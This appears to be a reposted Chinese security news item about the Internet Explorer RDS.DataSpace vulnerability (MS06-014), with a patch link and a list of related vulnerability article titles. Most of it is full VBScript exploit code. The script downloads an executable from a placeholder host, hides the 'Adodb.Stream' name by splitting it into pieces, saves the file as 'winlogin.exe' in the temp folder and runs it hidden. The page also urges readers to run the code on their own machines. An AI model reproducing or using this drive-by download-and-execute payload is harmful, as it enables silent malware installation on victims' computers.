【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件
2023-06-13 09:13:53 时间
请执行下面的代码测试您的机器是否存在漏洞:
补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
相关文章
- XSS漏洞介绍及反射型XSS
- upload-labs文件上传漏洞
- PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)
- 文件包含漏洞—allow_url_fopen和allow_url_include详解
- ewebeditor php漏洞,ewebeditor for php任意文件上传漏洞「建议收藏」
- Weblogic任意文件上传漏洞(CVE-2019-2618)
- Weblogic反序列化远程代码执行漏洞(CVE-2019-2729)
- 文件上传漏洞知识总结
- 漏洞分析:MS14-058(CVE-2014-4113)
- ICMS 8.0.0后台任意文件读取0day漏洞分析
- 【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)
- 2022-09微软漏洞通告
- phpMyAdmin 4.8.1 远程文件包含漏洞复现
- 文件包含漏洞-知识点
- 【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍
- 【谣言】宝塔面板疑似出现全新高危漏洞,目前已出现大面积入侵
- Fuxploider:一款针对文件上传漏洞的安全检测与研究工具
- autoSSRF:一款基于上下文的智能SSRF漏洞扫描工具
- AI将取代人类?机器人ChatGPT能测漏洞、审代码还能修bug
- MySQL 漏洞修复:强固数据库安全(mysql漏洞修复)
- 微软本月补丁星期二共计修复108处漏洞 其中19处为关键漏洞
- 开源 Web 应用最常见漏洞是 XSS 和 SQLI 漏洞
- 学会挖洞系列之JSON Hijacking漏洞挖掘
- 看个视频也被黑?加载字幕文件触发播放器漏洞实现系统入侵
- 对众多知名公司造成影响的Oracle Responsys本地文件包含漏洞
- MySQL数据库漏洞扫描技术的应用与发展(mysql漏洞扫描)
- mssql 注入漏洞:利用上传文件实现远程操作(mssql 注入上传文件)
- MySQL漏洞下载文件提权攻击(mysql下载文件提权)
- 紧急修复Oracle ERP系统漏洞发现(oracle erp漏洞)
- 黑莓软件存在漏洞却闭口不言 许多汽车恐被攻击
- PHP5.2下chunk_split()函数整数溢出漏洞分析
- ASP的chr(0)文件上传漏洞原理和解决方法介绍